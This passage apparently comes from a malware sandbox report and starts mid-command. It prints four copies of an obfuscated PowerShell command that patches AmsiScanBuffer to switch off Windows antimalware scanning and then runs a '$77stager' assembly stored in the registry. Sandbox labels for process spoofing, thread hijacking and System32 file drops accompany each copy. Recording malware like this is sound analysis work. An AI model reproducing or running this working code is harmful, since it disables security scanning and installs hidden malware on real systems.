Reflection.AssemblyName(''+[Char](82)+'ef'+[Char](108)+''+[Char](101)+''+[Char](99)+'t'+[Char](101)+'d'+[Char](68)+''+'e'+''+[Char](108)+''+'e'+''+[Char](103)+'a'+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'Me'+'m'+'o'+[Char](114)+''+'y'+'M'+'o'+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+'D'+[Char](101)+''+[Char](108)+'e'+'g'+'at'+[Char](101)+''+[Char](84)+''+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+'C'+''+[Char](108)+''+'a'+'ss'+','+''+[Char](80)+'u'+[Char](98)+'l'+[Char](105)+''+[Char](99)+''+','+''+[Char](83)+''+[Char](101)+'a'+[Char](108)+''+[Char](101)+''+[Char](100)+''+[Char](44)+''+'A'+'n'+'s'+''+'i'+''+[Char](67)+'l'+[Char](97)+''+[Char](115)+''+[Char](115)+''+','+''+'A'+''+[Char](117)+''+[Char](116)+'o'+[Char](67)+''+[Char](108)+'a'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$fJQFizuUZGs.DefineConstructor('RT'+[Char](83)+''+[Char](112)+''+[Char](101)+''+'c'+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+'N'+''+'a'+''+[Char](109)+''+'e'+''+[Char](44)+''+'H'+'ide'+[Char](66)+''+[Char](121)+''+[Char](83)+'ig'+[Char](44)+''+[Char](80)+''+[Char](117)+''+'b'+'l'+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$TdJGXyypLuvpZO).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+''+'t'+''+[Char](105)+''+[Char](109)+''+'e'+''+','+'M'+[Char](97)+''+'n'+''+'a'+''+[Char](103)+'e'+[Char](100)+'');$fJQFizuUZGs.DefineMethod(''+'I'+''+[Char](110)+'v'+[Char](111)+''+[Char](107)+'e',''+[Char](80)+'u'+[Char](98)+''+'l'+'ic'+','+''+[Char](72)+''+'i'+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+','+'Ne'+[Char](119)+''+'S'+'l'+[Char](111)+''+[Char](116)+''+[Char](44)+''+'V'+''+[Char](105)+''+[Char](114)+'t'+[Char](117)+''+'a'+'l',$fxMVmgtsMt,$TdJGXyypLuvpZO).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+'m'+'e'+',M'+[Char](97)+''+'n'+''+[Char](97)+''+'g'+''+[Char](101)+''+[Char](100)+'');Write-Output $fJQFizuUZGs.CreateType();}$mQsmrBfWxmpnN=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+''+[Char](115)+''+'t'+'e'+[Char](109)+''+'.'+'d'+[Char](108)+''+'l'+'')}).GetType('M'+[Char](105)+'c'+'r'+''+[Char](111)+''+[Char](115)+''+[Char](111)+'ft'+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+''+[Char](51)+'2'+[Char](46)+''+[Char](85)+''+[Char](110)+''+[Char](115)+'a'+'f'+''+'e'+''+[Char](78)+''+[Char](97)+''+'t'+''+[Char](105)+'v'+[Char](101)+''+[Char](77)+''+[Char](101)+''+[Char](116)+''+[Char](104)+''+'o'+'d'+'s'+'');$lrppqdyGNttpdY=$mQsmrBfWxmpnN.GetMethod('G'+'e'+'t'+'P'+'r'+[Char](111)+''+[Char](99)+''+[Char](65)+''+'d'+''+'d'+''+'r'+''+[Char](101)+''+'s'+''+[Char](115)+'',[Reflection.BindingFlags]('P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+','+[Char](83)+''+'t'+''+[Char](97)+''+[Char](116)+''+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$vmJPoeQqPIZfNgAJvCt=mBQYZHpyLvbl @([String])([IntPtr]);$hdWTORrXCPbmYpXMBCystd=mBQYZHpyLvbl @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$ymjskQnrGvG=$mQsmrBfWxmpnN.GetMethod(''+[Char](71)+'e'+'t'+''+[Char](77)+''+[Char](111)+'du'+'l'+''+'e'+''+[Char](72)+''+[Char](97)+'n'+[Char](100)+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+'e'+''+[Char](114)+''+'n'+'e'+'l'+''+'3'+''+'2'+''+'.'+'d'+[Char](108)+''+'l'+'')));$MBWnKslGIGAGex=$lrppqdyGNttpdY.Invoke($Null,@([Object]$ymjskQnrGvG,[Object](''+[Char](76)+'o'+[Char](97)+''+[Char](100)+'L'+'i'+''+'b'+''+[Char](114)+''+[Char](97)+''+'r'+''+'y'+''+'A'+'')));$TYmevrEvbEfukqdvW=$lrppqdyGNttpdY.Invoke($Null,@([Object]$ymjskQnrGvG,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+'tu'+[Char](97)+''+[Char](108)+''+[Char](80)+''+[Char](114)+'o'+'t'+''+[Char](101)+'ct')));$wVrBeDE=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MBWnKslGIGAGex,$vmJPoeQqPIZfNgAJvCt).Invoke('a'+[Char](109)+''+[Char](115)+''+[Char](105)+'.d'+[Char](108)+''+[Char](108)+'');$TNqZllUsKEgVRcytA=$lrppqdyGNttpdY.Invoke($Null,@([Object]$wVrBeDE,[Object](''+'A'+''+'m'+'s'+'i'+''+[Char](83)+''+[Char](99)+''+[Char](97)+'n'+'B'+'u'+[Char](102)+'f'+[Char](101)+''+'r'+'')));$UFGlTVRWYn=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($TYmevrEvbEfukqdvW,$hdWTORrXCPbmYpXMBCystd).Invoke($TNqZllUsKEgVRcytA,[uint32]8,4,[ref]$UFGlTVRWYn);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$TNqZllUsKEgVRcytA,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($TYmevrEvbEfukqdvW,$hdWTORrXCPbmYpXMBCystd).Invoke($TNqZllUsKEgVRcytA,[uint32]8,0x20,[ref]$UFGlTVRWYn);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+''+'F'+''+[Char](84)+''+[Char](87)+'AR'+[Char](69)+'').GetValue('$'+'7'+''+[Char](55)+''+[Char](115)+''+[Char](116)+''+[Char](97)+'g'+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:bLfgUXEtbVIq{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$LztQkhMMpKurXO,[Parameter(Position=1)][Type]$kRsqlEjtMN)$eyqhyNrTfwP=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+'f'+'l'+''+[Char](101)+''+[Char](99)+''+'t'+'e'+'d'+'D'+'e'+''+[Char](108)+''+'e'+''+[Char](103)+''+[Char](97)+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+[Char](77)+''+[Char](101)+''+'m'+''+[Char](111)+''+[Char](114)+''+[Char](121)+'M'+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType('M'+[Char](121)+''+'D'+''+[Char](101)+'l'+'e'+''+[Char](103)+'a'+[Char](116)+''+[Char](101)+'T'+[Char](121)+'p'+'e'+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s'+[Char](44)+''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+','+'S'+''+[Char](101)+'a'+[Char](108)+''+[Char](101)+'d'+[Char](44)+'A'+'n'+''+'s'+''+[Char](105)+''+[Char](67)+''+[Char](108)+''+'a'+''+'s'+''+'s'+''+[Char](44)+''+'A'+''+[Char](117)+''+[Char](116)+'o'+[Char](67)+''+[Char](108)+''+[Char](97)+'s'+[Char](115)+'',[MulticastDelegate]);$eyqhyNrTfwP.DefineConstructor('R'+'T'+''+[Char](83)+''+[Char](112)+'ec'+[Char](105)+''+[Char](97)+''+'l'+''+[Char](78)+''+'a'+'m'+'e'+''+','+''+[Char](72)+''+[Char](105)+'de'+'B'+'y'+[Char](83)+'ig,Pu'+'b'+''+'l'+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$LztQkhMMpKurXO).SetImplementationFlags('R'+[Char](117)+'nt'+'i'+''+'m'+'e'+[Char](44)+'M'+[Char](97)+''+'n'+''+'a'+''+'g'+''+'e'+''+'d'+'');$eyqhyNrTfwP.DefineMethod(''+'I'+'n'+[Char](118)+''+[Char](111)+'k'+[Char](101)+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+'lic'+[Char](44)+''+[Char](72)+''+[Char](105)+'d'+[Char](101)+''+[Char](66)+''+'y'+''+'S'+''+'i'+''+'g'+''+[Char](44)+'Ne'+[Char](119)+''+[Char](83)+''+[Char](108)+''+'o'+''+[Char](116)+''+','+''+[Char](86)+'i'+[Char](114)+'t'+[Char](117)+''+'a'+''+[Char](108)+'',$kRsqlEjtMN,$LztQkhMMpKurXO).SetImplementationFlags('Run'+[Char](116)+''+[Char](105)+''+'m'+''+[Char](101)+','+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+'d');Write-Output $eyqhyNrTfwP.CreateType();}$wifqYdGWcdXvE=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+'s'+''+'t'+'e'+[Char](109)+'.'+[Char](100)+''+'l'+''+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+[Char](114)+'o'+[Char](115)+''+[Char](111)+''+[Char](102)+''+[Char](116)+''+'.'+''+[Char](87)+''+[Char](105)+'n'+'3'+''+'2'+'.U'+[Char](110)+''+[Char](115)+'a'+[Char](102)+''+[Char](101)+''+[Char](78)+''+[Char](97)+''+'t'+'i'+[Char](118)+''+'e'+''+[Char](77)+''+[Char](101)+''+[Char](116)+''+[Char](104)+'o'+'d'+''+[Char](115)+'');$YOKanbkFalKCfF=$wifqYdGWcdXvE.GetMethod('G'+[Char](101)+'t'+[Char](80)+''+'r'+''+'o'+''+[Char](99)+''+[Char](65)+'d'+'d'+''+'r'+''+'e'+''+'s'+'s',[Reflection.BindingFlags](''+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+'i'+'c'+''+','+''+'S'+''+[Char](116)+''+[Char](97)+'t'+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$MEIzuVENAEYkbevfLgD=bLfgUXEtbVIq @([String])([IntPtr]);$CbtiBDSmweQyYxPXhuCJoN=bLfgUXEtbVIq @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$dPMKfitokkb=$wifqYdGWcdXvE.GetMethod('G'+[Char](101)+''+[Char](116)+''+'M'+''+[Char](111)+'d'+[Char](117)+''+[Char](108)+''+'e'+''+[Char](72)+''+[Char](97)+''+[Char](110)+''+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+'n'+[Char](101)+''+[Char](108)+''+[Char](51)+''+[Char](50)+''+'.'+''+'d'+''+[Char](108)+''+'l'+'')));$StKGxpCxAgLaMN=$YOKanbkFalKCfF.Invoke($Null,@([Object]$dPMKfitokkb,[Object]('L'+'o'+''+[Char](97)+''+'d'+''+[Char](76)+''+'i'+'b'+[Char](114)+''+[Char](97)+''+'r'+''+[Char](121)+''+[Char](65)+'')));$jGznyNbAGTIGXOMeI=$YOKanbkFalKCfF.Invoke($Null,@([Object]$dPMKfitokkb,[Object](''+'V'+''+[Char](105)+'r'+[Char](116)+''+'u'+'al'+'P'+'r'+[Char](111)+''+'t'+''+[Char](101)+''+[Char](99)+''+[Char](116)+'')));$znuIWnZ=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($StKGxpCxAgLaMN,$MEIzuVENAEYkbevfLgD).Invoke('am'+[Char](115)+'i'+[Char](46)+''+'d'+'l'+[Char](108)+'');$EtgnUZpxYvTCnhteP=$YOKanbkFalKCfF.Invoke($Null,@([Object]$znuIWnZ,[Object](''+[Char](65)+'m'+[Char](115)+''+[Char](105)+'S'+[Char](99)+'a'+'n'+''+[Char](66)+''+[Char](117)+''+[Char](102)+''+[Char](102)+'e'+[Char](114)+'')));$QBRSrYJJdS=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($jGznyNbAGTIGXOMeI,$CbtiBDSmweQyYxPXhuCJoN).Invoke($EtgnUZpxYvTCnhteP,[uint32]8,4,[ref]$QBRSrYJJdS);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$EtgnUZpxYvTCnhteP,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($jGznyNbAGTIGXOMeI,$CbtiBDSmweQyYxPXhuCJoN).Invoke($EtgnUZpxYvTCnhteP,[uint32]8,0x20,[ref]$QBRSrYJJdS);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+'O'+'F'+''+[Char](84)+''+[Char](87)+''+'A'+''+[Char](82)+''+'E'+'').GetValue(''+'$'+'7'+'7'+''+'s'+''+[Char](116)+''+'a'+'g'+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:SONTklceOPQI{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$rCzaMNUsWqkDAI,[Parameter(Position=1)][Type]$uGAJsqjwkl)$OgcvmaMbTFF=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+[Char](102)+''+'l'+''+'e'+''+[Char](99)+''+'t'+''+[Char](101)+''+[Char](100)+''+[Char](68)+''+'e'+''+'l'+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+[Char](77)+''+[Char](101)+''+[Char](109)+'o'+[Char](114)+''+[Char](121)+''+'M'+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType('M'+[Char](121)+''+[Char](68)+'e'+[Char](108)+''+[Char](101)+''+'g'+''+[Char](97)+''+'t'+''+'e'+''+'T'+''+[Char](121)+''+'p'+''+[Char](101)+'',''+[Char](67)+''+'l'+''+'a'+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+'P'+''+'u'+'b'+'l'+''+'i'+''+'c'+''+[Char](44)+''+[Char](83)+'e'+'a'+''+[Char](108)+''+[Char](101)+''+'d'+''+[Char](44)+''+[Char](65)+'n'+'s'+''+[Char](105)+''+[Char](67)+''+[Char](108)+''+[Char](97)+'s'+[Char](115)+','+'A'+''+[Char](117)+'t'+'o'+''+'C'+''+'l'+''+[Char](97)+''+'s'+''+'s'+'',[MulticastDelegate]);$OgcvmaMbTFF.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+'p'+'e'+'c'+[Char](105)+''+[Char](97)+''+[Char](108)+'Na'+[Char](109)+''+'e'+''+[Char](44)+''+[Char](72)+'i'+'d'+''+[Char](101)+''+[Char](66)+''+'y'+''+[Char](83)+'i'+'g'+','+'P'+'u'+[Char](98)+''+'l'+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$rCzaMNUsWqkDAI).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+''+'t'+''+[Char](105)+''+'m'+'e'+','+''+'M'+''+'a'+''+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$OgcvmaMbTFF.DefineMethod('I'+[Char](110)+''+'v'+''+'o'+'k'+'e'+'','P'+[Char](117)+''+[Char](98)+'l'+[Char](105)+''+[Char](99)+','+[Char](72)+'id'+'e'+'B'+'y'+'S'+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](78)+'e'+'w'+''+'S'+''+'l'+''+'o'+''+'t'+''+','+'Vir'+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+'',$uGAJsqjwkl,$rCzaMNUsWqkDAI).SetImplementationFlags(''+'R'+'u'+[Char](110)+''+[Char](116)+''+'i'+''+[Char](109)+'e,M'+[Char](97)+'nag'+[Char](101)+''+[Char](100)+'');Write-Output $OgcvmaMbTFF.CreateType();}$qyloivFYWSTlb=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+'y'+''+[Char](115)+'t'+'e'+'m'+'.'+'d'+'l'+'l')}).GetType('Mi'+'c'+''+[Char](114)+'os'+[Char](111)+'f'+'t'+'.'+'W'+''+[Char](105)+''+'n'+'3'+'2'+''+[Char](46)+''+[Char](85)+''+'n'+'s'+'a'+'f'+[Char](101)+'N'+[Char](97)+''+[Char](116)+'i'+[Char](118)+''+[Char](101)+''+[Char](77)+''+'e'+''+[Char](116)+'hod'+[Char](115)+'');$BgRuEgwBTdGMQi=$qyloivFYWSTlb.GetMethod(''+'G'+'et'+'P'+''+[Char](114)+'ocAd'+[Char](100)+''+[Char](114)+''+'e'+''+'s'+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+''+[Char](44)+''+[Char](83)+'t'+'a'+'t'+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$PaKRbyzFQVHpUWolUlf=SONTklceOPQI @([String])([IntPtr]);$kUjdraCumKSXoTqSagxSMM=SONTklceOPQI @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$IrYSFyoVapn=$qyloivFYWSTlb.GetMethod(''+'G'+''+'e'+'t'+[Char](77)+''+[Char](111)+'d'+[Char](117)+''+[Char](108)+''+'e'+''+'H'+'an'+'d'+'l'+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+''+'n'+''+[Char](101)+''+'l'+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](100)+''+[Char](108)+'l')));$PChgZgVYlwxCCu=$BgRuEgwBTdGMQi.Invoke($Null,@([Object]$IrYSFyoVapn,[Object](''+[Char](76)+''+'o'+''+[Char](97)+'d'+'L'+'i'+'b'+''+[Char](114)+''+'a'+''+[Char](114)+''+'y'+''+[Char](65)+'')));$uMjbDPfGtWlggMHqW=$BgRuEgwBTdGMQi.Invoke($Null,@([Object]$IrYSFyoVapn,[Object](''+'V'+'i'+[Char](114)+'tu'+[Char](97)+'l'+[Char](80)+''+[Char](114)+''+[Char](111)+''+'t'+''+'e'+''+[Char](99)+''+[Char](116)+'')));$YEBYWdV=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PChgZgVYlwxCCu,$PaKRbyzFQVHpUWolUlf).Invoke('a'+[Char](109)+''+'s'+''+[Char](105)+''+'.'+''+[Char](100)+''+[Char](108)+''+[Char](108)+'');$rRrTQskzMcEwrjDyE=$BgRuEgwBTdGMQi.Invoke($Null,@([Object]$YEBYWdV,[Object](''+[Char](65)+''+'m'+''+[Char](115)+''+'i'+'Sc'+[Char](97)+'n'+'B'+''+[Char](117)+''+[Char](102)+''+[Char](102)+''+[Char](101)+''+[Char](114)+'')));$JisHXVzqXw=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($uMjbDPfGtWlggMHqW,$kUjdraCumKSXoTqSagxSMM).Invoke($rRrTQskzMcEwrjDyE,[uint32]8,4,[ref]$JisHXVzqXw);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$rRrTQskzMcEwrjDyE,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($uMjbDPfGtWlggMHqW,$kUjdraCumKSXoTqSagxSMM).Invoke($rRrTQskzMcEwrjDyE,[uint32]8,0x20,[ref]$JisHXVzqXw);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+[Char](70)+''+[Char](84)+''+[Char](87)+''+[Char](65)+'R'+[Char](69)+'').GetValue(''+[Char](36)+''+[Char](55)+''+[Char](55)+''+[Char](115)+''+[Char](116)+''+'a'+''+[Char](103)+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:JmCNXqhiVeVv{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$rmIqrJuoYTIqjT,[Parameter(Position=1)][Type]$QYODwqpafn)$tKusbPtIdht=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+'f'+''+[Char](108)+'e'+[Char](99)+'t'+'e'+'d'+'D'+'e'+'l'+''+'e'+''+[Char](103)+''+[Char](97)+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+'M'+''+'e'+''+[Char](109)+''+'o'+''+'r'+''+[Char](121)+''+[Char](77)+''+'o'+''+[Char](100)+'u'+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+'Del'+[Char](101)+''+[Char](103)+''+'a'+'t'+[Char](101)+''+'T'+''+'y'+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+'P'+'u'+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+'S'+[Char](101)+'a'+'l'+''+'e'+'d'+[Char](44)+''+'A'+'n'+'s'+''+'i'+''+[Char](67)+''+'l'+''+[Char](97)+'ss'+[Char](44)+''+[Char](65)+''+[Char](117)+''+[Char](116)+''+[Char](111)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$tKusbPtIdht.DefineConstructor('R'+'T'+'S'+[Char](112)+'e'+[Char](99)+''+'i'+''+[Char](97)+''+[Char](108)+''+[Char](78)+''+'a'+'me'+','+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+'yS'+[Char](105)+'g'+','+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+'ic',[Reflection.CallingConventions]::Standard,$rmIqrJuoYTIqjT).SetImplementationFlags('Ru'+[Char](110)+''+[Char](116)+''+[Char](105)+''+'m'+''+'e'+','+[Char](77)+'a'+[Char](110)+''+[Char](97)+'g'+[Char](101)+''+'d'+'');$tKusbPtIdht.DefineMethod('I'+[Char](110)+'v'+'o'+''+[Char](107)+'e',''+[Char](80)+''+'u'+''+[Char](98)+'li'+[Char](99)+','+[Char](72)+''+'i'+''+[Char](100)+'eB'+[Char](121)+''+[Char](83)+'i'+[Char](103)+''+[Char](44)+'N'+[Char](101)+'w'+'S'+''+'l'+''+'o'+'t'+[Char](44)+''+'V'+''+'i'+''+'r'+''+'t'+'ua'+[Char](108)+'',$QYODwqpafn,$rmIqrJuoYTIqjT).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'n'+[Char](116)+'im'+[Char](101)+','+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+'g'+[Char](101)+'d');Write-Output $tKusbPtIdht.CreateType();}$jAkjhhEYfyPPY=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+'y'+''+'s'+''+[Char](116)+''+'e'+''+'m'+''+'.'+''+[Char](100)+'l'+[Char](108)+'')}).GetType(''+[Char](77)+''+'i'+''+'c'+''+'r'+''+[Char](111)+''+[Char](115)+''+'o'+''+'f'+'t'+[Char](46)+'W'+[Char](105)+'n'+[Char](51)+''+'2'+''+'.'+'U'+[Char](110)+''+'s'+''+[Char](97)+''+'f'+''+'e'+''+[Char](78)+'a'+'t'+''+[Char](105)+''+[Char](118)+'eM'+[Char](101)+'tho'+[Char](100)+'s');$pikNhURDLBYOdr=$jAkjhhEYfyPPY.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+'c'+''+[Char](65)+''+'d'+''+[Char](100)+''+[Char](114)+''+'e'+'s'+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+'u'+'b'+'l'+'ic'+','+''+[Char](83)+''+[Char](116)+''+[Char](97)+''+[Char](116)+''+'i'+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$lCtZrtPTLpeVyKfBSKl=JmCNXqhiVeVv @([String])([IntPtr]);$FKZWzGznSSHBpKPBlmnKYz=JmCNXqhiVeVv @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$tAMDaotjipR=$jAkjhhEYfyPPY.GetMethod('G'+'e'+''+[Char](116)+''+[Char](77)+'od'+[Char](117)+''+'l'+'eH'+[Char](97)+''+'n'+'dl'+'e'+'').Invoke($Null,@([Object]('k'+[Char](101)+''+'r'+''+[Char](110)+''+'e'+''+[Char](108)+''+[Char](51)+''+'2'+'.d'+[Char](108)+''+[Char](108)+'')));$yxOTkAmFaXNpbK=$pikNhURDLBYOdr.Invoke($Null,@([Object]$tAMDaotjipR,[Object](''+[Char](76)+''+'o'+'a'+[Char](100)+''+'L'+'i'+[Char](98)+''+[Char](114)+'a'+[Char](114)+'yA')));$GOdwwGbVuLvnhfCdE=$pikNhURDLBYOdr.Invoke($Null,@([Object]$tAMDaotjipR,[Object]('V'+'i'+''+[Char](114)+'tu'+[Char](97)+''+'l'+''+[Char](80)+'r'+[Char](111)+''+[Char](116)+''+'e'+''+'c'+''+[Char](116)+'')));$BFmkFVH=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($yxOTkAmFaXNpbK,$lCtZrtPTLpeVyKfBSKl).Invoke(''+[Char](97)+''+[Char](109)+''+'s'+''+[Char](105)+''+'.'+''+'d'+''+[Char](108)+''+[Char](108)+'');$jmJKsUKdYrksVzXhj=$pikNhURDLBYOdr.Invoke($Null,@([Object]$BFmkFVH,[Object](''+[Char](65)+'ms'+'i'+''+'S'+''+[Char](99)+'a'+[Char](110)+''+'B'+''+[Char](117)+''+[Char](102)+''+[Char](102)+'e'+[Char](114)+'')));$hxCobDrVGl=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GOdwwGbVuLvnhfCdE,$FKZWzGznSSHBpKPBlmnKYz).Invoke($jmJKsUKdYrksVzXhj,[uint32]8,4,[ref]$hxCobDrVGl);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$jmJKsUKdYrksVzXhj,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GOdwwGbVuLvnhfCdE,$FKZWzGznSSHBpKPBlmnKYz).Invoke($jmJKsUKdYrksVzXhj,[uint32]8,0x20,[ref]$hxCobDrVGl);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+'T'+[Char](87)+''+[Char](65)+''+'R'+''+'E'+'').GetValue(''+[Char](36)+''+[Char](55)+''+[Char](55)+''+[Char](115)+'t'+'a'+''+'g'+'er')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
-
